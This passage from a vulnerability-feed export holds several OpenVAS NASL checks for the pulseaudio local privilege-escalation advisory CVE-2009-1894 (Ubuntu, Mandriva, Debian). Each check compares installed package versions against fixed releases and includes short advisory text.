isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore9-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore9\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:32", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:64394", "href": "http://plugins.openvas.org/nasl.php?oid=64394", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_152.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:152 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:152\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.\";\n\n \n\nif(description)\n{\n script_id(64394);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:12", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1838-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64476", "href": "http://plugins.openvas.org/nasl.php?oid=64476", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1838_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1838-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201838-1\";\n\n\nif(description)\n{\n script_id(64476);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1838-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:35", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064394", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064394", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_152.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:152 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are 